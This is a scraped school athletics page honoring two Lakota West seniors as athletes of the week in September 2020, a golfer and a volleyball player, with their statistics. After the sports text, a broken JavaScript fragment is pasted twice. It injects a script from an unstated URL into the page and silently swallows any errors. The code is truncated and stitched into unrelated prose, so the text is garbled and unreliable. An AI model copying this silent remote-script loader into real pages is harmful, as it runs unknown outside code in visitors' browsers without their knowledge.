Athletes of the Week

Kemba Credit Union Athletes of the Week 9/7/2020-9/13/2020

Jacob Bitonte
Senior, Boys Golf

Jacob shot a tremendous 5 over par at Heatherwoode Golf Club posting a 76 for Lakota West.

 

 

 

 

 

 

Syd Hilderbran
Senior, Girls Volleyball

Syd lead Lakota West Girls Volleyball to 3 victories this past week.  The final being against a strong Loveland team and going 5 sets.   Through the 3 matches, Syd tallied 9 aces and 36 kills.  She passed a 2.2 and hit 296.  She also provided 9 blocks (2 solo) and 21 digs.

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

Popular Posts